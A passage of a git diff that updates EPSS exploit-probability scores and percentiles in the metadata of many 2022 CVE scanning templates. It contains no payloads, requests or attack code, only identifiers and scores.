0.29353 cpe: cpe:2.3:a:crmperks:crm_perks_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml index 6b3c874da9..db4e413eec 100644 --- a/http/cves/2022/CVE-2022-38553.yaml +++ b/http/cves/2022/CVE-2022-38553.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-38553 cwe-id: CWE-79 - epss-score: 0.001 - epss-percentile: 0.40523 + epss-score: 0.00129 + epss-percentile: 0.474 cpe: cpe:2.3:a:creativeitem:academy_learning_management_system:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml index f4f6a2e7e4..f1590f0806 100644 --- a/http/cves/2022/CVE-2022-38637.yaml +++ b/http/cves/2022/CVE-2022-38637.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-38637 cwe-id: CWE-89 - epss-score: 0.01481 - epss-percentile: 0.8515 + epss-score: 0.0127 + epss-percentile: 0.84138 cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-38794.yaml b/http/cves/2022/CVE-2022-38794.yaml index b94e02c18e..ce10a42b64 100644 --- a/http/cves/2022/CVE-2022-38794.yaml +++ b/http/cves/2022/CVE-2022-38794.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-38794 cwe-id: CWE-22 - epss-score: 0.00318 - epss-percentile: 0.66648 + epss-score: 0.0046 + epss-percentile: 0.72526 cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-38817.yaml b/http/cves/2022/CVE-2022-38817.yaml index 486b7959b7..930056a61a 100644 --- a/http/cves/2022/CVE-2022-38817.yaml +++ b/http/cves/2022/CVE-2022-38817.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-38817 cwe-id: CWE-306 - epss-score: 0.0075 - epss-percentile: 0.78669 + epss-score: 0.00898 + epss-percentile: 0.80888 cpe: cpe:2.3:a:linuxfoundation:dapr_dashboard:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml index 4eec3c0609..ab54e0fa76 100644 --- a/http/cves/2022/CVE-2022-38870.yaml +++ b/http/cves/2022/CVE-2022-38870.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-38870 cwe-id: CWE-306 - epss-score: 0.00334 - epss-percentile: 0.67526 + epss-score: 0.0037 + epss-percentile: 0.69435 cpe: cpe:2.3:a:free5gc:free5gc:3.2.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-3908.yaml b/http/cves/2022/CVE-2022-3908.yaml index 085cd55ce7..78b8addac6 100644 --- a/http/cves/2022/CVE-2022-3908.yaml +++ b/http/cves/2022/CVE-2022-3908.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-3908 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29012 + epss-percentile: 0.29353 cpe: cpe:2.3:a:helloprint:helloprint:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml index 4a3d0ba77c..6e60315259 100644 --- a/http/cves/2022/CVE-2022-39195.yaml +++ b/http/cves/2022/CVE-2022-39195.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-39195 cwe-id: CWE-79 - epss-score: 0.00125 - epss-percentile: 0.46238 + epss-score: 0.00132 + epss-percentile: 0.47928 cpe: cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3933.yaml b/http/cves/2022/CVE-2022-3933.yaml index 4bbd474257..71b8758aa8 100644 --- a/http/cves/2022/CVE-2022-3933.yaml +++ b/http/cves/2022/CVE-2022-3933.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-3933 cwe-id: CWE-79 epss-score: 0.00077 - epss-percentile: 0.31826 + epss-percentile: 0.32183 cpe: cpe:2.3:a:g5theme:essential_real_estate:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3934.yaml b/http/cves/2022/CVE-2022-3934.yaml index 754e34be11..7f03f92a36 100644 --- a/http/cves/2022/CVE-2022-3934.yaml +++ b/http/cves/2022/CVE-2022-3934.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-3934 cwe-id: CWE-79 epss-score: 0.00077 - epss-percentile: 0.31826 + epss-percentile: 0.32183 cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index 4dc0caad57..954ac8ad46 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-3980 cwe-id: CWE-611 - epss-score: 0.75202 - epss-percentile: 0.97737 + epss-score: 0.58498 + epss-percentile: 0.97344 cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml index cce8226756..511d6bb547 100644 --- a/http/cves/2022/CVE-2022-3982.yaml +++ b/http/cves/2022/CVE-2022-3982.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-3982 cwe-id: CWE-434 - epss-score: 0.40713 - epss-percentile: 0.96796 + epss-score: 0.33133 + epss-percentile: 0.96515 cpe: cpe:2.3:a:wpdevart:booking_calendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index f6c8a14ba9..d939526448 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-39952 cwe-id: CWE-668 - epss-score: 0.9679 - epss-percentile: 0.99533 + epss-score: 0.8966 + epss-percentile: 0.98405 cpe: cpe:2.3:a:fortinet:fortinac:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml index 409c36d598..da6a527ade 100644 --- a/http/cves/2022/CVE-2022-39960.yaml +++ b/http/cves/2022/CVE-2022-39960.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-39960 cwe-id: CWE-862 - epss-score: 0.24986 - epss-percentile: 0.96046 + epss-score: 0.23051 + epss-percentile: 0.95975 cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:jira:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml index 3ebe24f624..83c34c4e91 100644 --- a/http/cves/2022/CVE-2022-39986.yaml +++ b/http/cves/2022/CVE-2022-39986.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-39986 cwe-id: CWE-77 - epss-score: 0.60136 - epss-percentile: 0.97326 + epss-score: 0.67236 + epss-percentile: 0.97563 cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml index c9c099289f..3d17b0c4cb 100644 --- a/http/cves/2022/CVE-2022-40022.yaml +++ b/http/cves/2022/CVE-2022-40022.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40022 cwe-id: CWE-77 - epss-score: 0.70919 - epss-percentile: 0.9761 + epss-score: 0.80333 + epss-percentile: 0.97932 cpe: cpe:2.3:o:microchip:syncserver_s650_firmware:-:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-40083.yaml b/http/cves/2022/CVE-2022-40083.yaml index d945b3963f..19299e5b52 100644 --- a/http/cves/2022/CVE-2022-40083.yaml +++ b/http/cves/2022/CVE-2022-40083.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.6 cve-id: CVE-2022-40083 cwe-id: CWE-601 - epss-score: 0.01662 - epss-percentile: 0.86042 + epss-score: 0.01469 + epss-percentile: 0.85258 cpe: cpe:2.3:a:labstack:echo:4.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml index 97f498bfd1..73db6c514f 100644 --- a/http/cves/2022/CVE-2022-40127.yaml +++ b/http/cves/2022/CVE-2022-40127.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-40127 cwe-id: CWE-94 - epss-score: 0.17166 - epss-percentile: 0.95397 + epss-score: 0.15773 + epss-percentile: 0.9531 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40359.yaml b/http/cves/2022/CVE-2022-40359.yaml index 58830e72af..952f91286a 100644 --- a/http/cves/2022/CVE-2022-40359.yaml +++ b/http/cves/2022/CVE-2022-40359.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-40359 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.32136 + epss-score: 0.001 + epss-percentile: 0.40722 cpe: cpe:2.3:a:kfm_project:kfm:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index 1b4353d0bf..696f676a04 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4050 cwe-id: CWE-89 - epss-score: 0.31266 - epss-percentile: 0.96404 + epss-score: 0.02366 + epss-percentile: 0.88587 cpe: cpe:2.3:a:beardev:joomsport:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml index 9feb4a4144..e602c820c0 100644 --- a/http/cves/2022/CVE-2022-4057.yaml +++ b/http/cves/2022/CVE-2022-4057.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-4057 cwe-id: CWE-425 epss-score: 0.00177 - epss-percentile: 0.54176 + epss-percentile: 0.54603 cpe: cpe:2.3:a:optimizingmatters:autooptimize:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4060.yaml b/http/cves/2022/CVE-2022-4060.yaml index 67fc26c094..3e72303aec 100644 --- a/http/cves/2022/CVE-2022-4060.yaml +++ b/http/cves/2022/CVE-2022-4060.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4060 cwe-id: CWE-94 - epss-score: 0.05043 - epss-percentile: 0.91883 + epss-score: 0.33993 + epss-percentile: 0.96555 cpe: cpe:2.3:a:odude:user_post_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml index 340dc73865..9a7a4ccf71 100644 --- a/http/cves/2022/CVE-2022-4063.yaml +++ b/http/cves/2022/CVE-2022-4063.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4063 cwe-id: CWE-22 - epss-score: 0.00819 - epss-percentile: 0.79674 + epss-score: 0.01789 + epss-percentile: 0.86669 cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40684.yaml b/http/cves/2022/CVE-2022-40684.yaml index 846fbd622c..b70d83c10b 100644 --- a/http/cves/2022/CVE-2022-40684.yaml +++ b/http/cves/2022/CVE-2022-40684.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40684 cwe-id: CWE-287 - epss-score: 0.96782 - epss-percentile: 0.9953 + epss-score: 0.94733 + epss-percentile: 0.98997 cpe: cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml index d8e3438636..2d9c97930d 100644 --- a/http/cves/2022/CVE-2022-40734.yaml +++ b/http/cves/2022/CVE-2022-40734.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.5 cve-id: CVE-2022-40734 cwe-id: CWE-22 - epss-score: 0.00783 - epss-percentile: 0.79184 + epss-score: 0.00804 + epss-percentile: 0.79759 cpe: cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index 8fc98c285f..5c0989e2bb 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -16,8 +16,8 @@ info: cvss-score: 4.9 cve-id: CVE-2022-40843 cwe-id: CWE-287 - epss-score: 0.5155 - epss-percentile: 0.97125 + epss-score: 0.49868 + epss-percentile: 0.97129 cpe: cpe:2.3:o:tenda:w15e_firmware:15.11.0.10\(1576\):*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml index 39b66b0432..047d3a7d15 100644 --- a/http/cves/2022/CVE-2022-40879.yaml +++ b/http/cves/2022/CVE-2022-40879.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-40879 cwe-id: CWE-79 - epss-score: 0.02057 - epss-percentile: 0.87582 + epss-score: 0.01162 + epss-percentile: 0.83315 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml index c7a0696a35..96e6e74191 100644 --- a/http/cves/2022/CVE-2022-40881.yaml +++ b/http/cves/2022/CVE-2022-40881.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-40881 cwe-id: CWE-77 - epss-score: 0.94859 - epss-percentile: 0.98977 + epss-score: 0.95265 + epss-percentile: 0.99109 cpe: cpe:2.3:o:contec:solarview_compact_firmware:6.00:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml index 2d4056fe62..99d9ef823b 100644 --- a/http/cves/2022/CVE-2022-4117.yaml +++ b/http/cves/2022/CVE-2022-4117.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-4117 cwe-id: CWE-89 - epss-score: 0.12065 - epss-percentile: 0.94628 + epss-score: 0.02479 + epss-percentile: 0.88841 cpe: cpe:2.3:a:iws-geo-form-fields_project:iws-geo-form-fields:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4140.yaml b/http/cves/2022/CVE-2022-4140.yaml index b103b553c6..3539ccd890 100644 --- a/http/cves/2022/CVE-2022-4140.yaml +++ b/http/cves/2022/CVE-2022-4140.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-4140 cwe-id: CWE-552 - epss-score: 0.00516 - epss-percentile: 0.73753 + epss-score: 0.00513 + epss-percentile: 0.73952 cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index 9a57bb4d17..ce5d684bee 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-41441 cwe-id: CWE-79 - epss-score: 0.00104 - epss-percentile: 0.41863 + epss-score: 0.00091 + epss-percentile: 0.38603 cpe: cpe:2.3:a:reqlogic:reqlogic:11.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index 5bd8161046..558f4b4a18 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-41473 cwe-id: CWE-79 - epss-score: 0.0332 - epss-percentile: 0.9008 + epss-score: 0.02259 + epss-percentile: 0.88329 cpe: cpe:2.3:a:rpcms:rpcms:3.0.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-41840.yaml b/http/cves/2022/CVE-2022-41840.yaml index 3084754ade..0fb8a86340 100644 --- a/http/cves/2022/CVE-2022-41840.yaml +++ b/http/cves/2022/CVE-2022-41840.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-41840 cwe-id: CWE-22 - epss-score: 0.00635 - epss-percentile: 0.76449 + epss-score: 0.00465 + epss-percentile: 0.72642 cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml index 977282b0a7..8d1d5dc7a5 100644 --- a/http/cves/2022/CVE-2022-42094.yaml +++ b/http/cves/2022/CVE-2022-42094.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-42094 cwe-id: CWE-79 epss-score: 0.00564 - epss-percentile: 0.74906 + epss-percentile: 0.75191 cpe: cpe:2.3:a:backdropcms:backdrop:1.23.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42095.yaml b/http/cves/2022/CVE-2022-42095.yaml index ae0a23d0f8..b9ba88a625 100644 --- a/http/cves/2022/CVE-2022-42095.yaml +++ b/http/cves/2022/CVE-2022-42095.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-42095 cwe-id: CWE-79 epss-score: 0.00431 - epss-percentile: 0.71305 + epss-percentile: 0.71603 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42096.yaml b/http/cves/2022/CVE-2022-42096.yaml index f272390794..fc7e611c87 100644 --- a/http/cves/2022/CVE-2022-42096.yaml +++ b/http/cves/2022/CVE-2022-42096.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-42096 cwe-id: CWE-79 epss-score: 0.00569 - epss-percentile: 0.74992 + epss-percentile: 0.7528 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42233.yaml b/http/cves/2022/CVE-2022-42233.yaml index 981c768d31..7ae79e2c56 100644 --- a/http/cves/2022/CVE-2022-42233.yaml +++ b/http/cves/2022/CVE-2022-42233.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-42233 cwe-id: CWE-287 - epss-score: 0.89148 - epss-percentile: 0.98301 + epss-score: 0.89303 + epss-percentile: 0.98384 cpe: cpe:2.3:o:tenda:11n_firmware:5.07.33_cn:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4260.yaml b/http/cves/2022/CVE-2022-4260.yaml index bb2a142929..49b9006ccf 100644 --- a/http/cves/2022/CVE-2022-4260.yaml +++ b/http/cves/2022/CVE-2022-4260.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2022-4260 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32136 + epss-percentile: 0.32498 cpe: cpe:2.3:a:wp-ban_project:wp-ban:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml index bcd5c1b983..72d4a09c51 100644 --- a/http/cves/2022/CVE-2022-42746.yaml +++ b/http/cves/2022/CVE-2022-42746.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-42746 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.28972 + epss-score: 0.00078 + epss-percentile: 0.325 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml index e4fc5d20aa..53aa44cd5e 100644 --- a/http/cves/2022/CVE-2022-42747.yaml +++ b/http/cves/2022/CVE-2022-42747.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-42747 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.28972 + epss-score: 0.00078 + epss-percentile: 0.325 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml index f769c8aff8..7a69eaa6b6 100644 --- a/http/cves/2022/CVE-2022-42748.yaml +++ b/http/cves/2022/CVE-2022-42748.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-42748 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.28972 + epss-score: 0.00078 + epss-percentile: 0.325 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml index 8de7d1a687..79063411a7 100644 --- a/http/cves/2022/CVE-2022-42749.yaml +++ b/http/cves/2022/CVE-2022-42749.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-42749 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.28972 + epss-score: 0.00078 + epss-percentile: 0.325 cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml index fc441ddb6d..6d0d2cf9ba 100644 --- a/http/cves/2022/CVE-2022-4295.yaml +++ b/http/cves/2022/CVE-2022-4295.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-4295 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26173 + epss-score: 0.00071 + epss-percentile: 0.29353 cpe: cpe:2.3:a:appjetty:show_all_comments:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4301.yaml b/http/cves/2022/CVE-2022-4301.yaml index e979aab6b4..23beb87f11 100644 --- a/http/cves/2022/CVE-2022-4301.yaml +++ b/http/cves/2022/CVE-2022-4301.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2022-4301 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29012 + epss-percentile: 0.29353 cpe: cpe:2.3:a:sunshinephotocart:sunshine_photo_cart:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml index 1325a23249..62dcb4016f 100644 --- a/http/cves/2022/CVE-2022-43014.yaml +++ b/http/cves/2022/CVE-2022-43014.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-43014 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29005 + epss-score: 0.00078 + epss-percentile: 0.32844 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml index 9e7389a23a..478ea4dbd1 100644 --- a/http/cves/2022/CVE-2022-43015.yaml +++ b/http/cves/2022/CVE-2022-43015.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-43015 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29005 + epss-score: 0.00078 + epss-percentile: 0.32844 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml index 7ac0949403..38cb6e9bc0 100644 --- a/http/cves/2022/CVE-2022-43016.yaml +++ b/http/cves/2022/CVE-2022-43016.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-43016 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29005 + epss-score: 0.00078 + epss-percentile: 0.32844 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml index 2a05e42ef9..72a557e56b 100644 --- a/http/cves/2022/CVE-2022-43017.yaml +++ b/http/cves/2022/CVE-2022-43017.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-43017 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29005 + epss-score: 0.00078 + epss-percentile: 0.32844 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43018.yaml b/http/cves/2022/CVE-2022-43018.yaml index 5e2d896f5d..003225ed1a 100644 --- a/http/cves/2022/CVE-2022-43018.yaml +++ b/http/cves/2022/CVE-2022-43018.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-43018 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29005 + epss-score: 0.00078 + epss-percentile: 0.32844 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-4306.yaml b/http/cves/2022/CVE-2022-4306.yaml index 63125280bf..8afeb73c70 100644 --- a/http/cves/2022/CVE-2022-4306.yaml +++ b/http/cves/2022/CVE-2022-4306.yaml @@ -15,8 +15,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-4306 cwe-id: CWE-79 - epss-score: 0.0007 - epss-percentile: 0.28777 + epss-score: 0.00077 + epss-percentile: 0.32183 cpe: cpe:2.3:a:panda_pods_repeater_field_project:panda_pods_repeater_field:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43140.yaml b/http/cves/2022/CVE-2022-43140.yaml index 1ab6cc60e2..621bc98b57 100644 --- a/http/cves/2022/CVE-2022-43140.yaml +++ b/http/cves/2022/CVE-2022-43140.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-43140 cwe-id: CWE-918 - epss-score: 0.05929 - epss-percentile: 0.92483 + epss-score: 0.17957 + epss-percentile: 0.95556 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml index 2f2a5a2deb..94a5dba7b1 100644 --- a/http/cves/2022/CVE-2022-43164.yaml +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43164 cwe-id: CWE-79 - epss-score: 0.00076 - epss-percentile: 0.31098 + epss-score: 0.00268 + epss-percentile: 0.6399 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml index 262b60e9e4..ec88c809a3 100644 --- a/http/cves/2022/CVE-2022-43165.yaml +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43165 cwe-id: CWE-79 - epss-score: 0.00076 - epss-percentile: 0.31098 + epss-score: 0.00268 + epss-percentile: 0.6399 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml index c434f4f2b0..d7476b8d35 100644 --- a/http/cves/2022/CVE-2022-43166.yaml +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43166 cwe-id: CWE-79 - epss-score: 0.00076 - epss-percentile: 0.31098 + epss-score: 0.00268 + epss-percentile: 0.6399 cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml index bc6d3f6413..8a5d28028e 100644 --- a/http/cves/2022/CVE-2022-43167.yaml +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.4 cve-id: CVE-2022-43167 cwe-id: CWE-79 - epss-score: 0.00076 - epss-percentile: 0.31098 + epss-score: 0.00268 + epss-percentile: 0.6399 cpe: 